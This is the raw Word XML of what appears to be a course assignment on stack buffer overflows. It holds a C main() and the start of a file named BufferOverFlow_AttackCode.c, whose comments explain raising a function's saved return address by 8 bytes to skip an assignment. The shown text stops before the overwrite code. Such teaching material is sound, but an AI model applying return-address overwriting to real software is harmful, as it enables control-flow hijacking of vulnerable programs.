          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>void main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5680AE" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A935680" w14:textId="50FA336C" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A2453" w14:textId="0B30F9E7" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000043FF" w14:textId="4B983B53" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>function(1,2,3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253D37D3" w14:textId="5B280F38" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x = 1;</w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//Bypass the assignment statement 'x = 1' by lauching the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3893573F" w14:textId="708A597C" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>printf("%d\n",x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF3F114" w14:textId="4E03469E" w:rsidR="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8E979" w14:textId="757821EB" w:rsidR="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBA3061" w14:textId="7386C9B3" w:rsidR="000C73DF" w:rsidRDefault="000C73DF" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C73DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BufferOverFlow_AttackCode.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4D4DC" w14:textId="0F96C714" w:rsidR="000C73DF" w:rsidRDefault="000C73DF" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11420C34" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDAD413" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this example of a buffer overflow, we attempt to bypass the assignment statement by calling a method named "function" from the main function. When the method is called, the parameters are stored on the stack along with the return address, saved frame pointer, and local variables like buffer1 and buffer2, which are also pushed onto the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F06A4AF" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE8A7DC" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this scenario, our aim is to modify the return address of the function by increasing its value by 8 bytes. By doing so, we can bypass the assignment statement immediately following it and proceed directly to the printf statement located at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C9E68" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5BC72" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11AB31E4" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5AE73" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42225B94" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>void function (int a, int b, int c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B200286" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560DACA4" w14:textId="7E70B9C0" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char buffer1[5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A4E0E0" w14:textId="4F76B0DB" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char buffer2[10];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0153CE4A" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="071DA95B" w14:textId="252BA2CE" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int *ret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6AB94" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D210F7D" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285C11E1" w14:textId="4E53E8AF" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
